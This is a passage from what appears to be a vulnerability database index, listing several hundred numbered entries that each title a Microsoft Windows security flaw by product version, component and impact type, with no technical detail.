Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88280] Microsoft Windows DCE/RPC information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak 